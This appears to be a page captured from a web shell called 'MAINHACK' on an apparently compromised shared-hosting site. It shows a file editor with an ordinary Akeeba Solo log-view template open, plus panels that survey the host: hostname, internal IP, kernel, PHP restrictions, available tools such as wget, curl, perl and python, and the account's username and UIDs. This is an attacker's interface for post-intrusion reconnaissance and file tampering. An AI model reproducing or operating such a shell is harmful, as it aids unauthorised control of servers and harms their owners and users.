[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: default.blade.php
<?php /** * @package solo * @copyright Copyright (c)2014-2025 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ defined('_AKEEBA') or die(); // Used for type hinting /** @var \Solo\View\Log\Html $this */ ?> @if(isset($this->logs) && count($this->logs)) <form name="adminForm" id="adminForm" action="@route('index.php?view=Log')" method="POST" class="akeeba-form--inline"> <div class="akeeba-form-group"> <label for="tag"> @lang('COM_AKEEBA_LOG_CHOOSE_FILE_TITLE') </label> @html('select.genericList', $this->logs, 'tag', ['list.attr' => ['class' => 'akeebaGridViewAutoSubmitOnChange'], 'list.select' => $this->tag, 'id' => 'tag']) </div> @if(!empty($this->tag)) <div class="akeeba-form-group--actions"> <a class="akeeba-btn--primary" href="@route('index.php?view=Log&task=download&format=raw&tag=' . urlencode($this->tag))"> <span class="akion-ios-download"></span> @lang('COM_AKEEBA_LOG_LABEL_DOWNLOAD') </a> </div> @endif <input type="hidden" name="token" value="@token()"> </form> @endif @if(!empty($this->tag)) @if ($this->logTooBig) <div class="akeeba-block--warning"> <p> @sprintf('COM_AKEEBA_LOG_SIZE_WARNING', number_format($this->logSize / (1024 * 1024), 2)) </p> <button class="akeeba-btn--dark" id="showlog"> @lang('COM_AKEEBA_LOG_SHOW_LOG') </button> </div> @endif <div id="iframe-holder" class="akeeba-panel--primary" style="display: {{ $this->logTooBig ? 'none' : 'block' }};"> @if (!$this->logTooBig) <iframe src="@route('index.php?view=Log&task=iframe&format=raw&tag=' . urlencode($this->tag))" width="99%" height="400px"> </iframe> @endif </div> @endif @if( ! (isset($this->logs) && count($this->logs))) <div class="alert alert-danger"> @lang('COM_AKEEBA_LOG_NONE_FOUND') </div> @endif
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697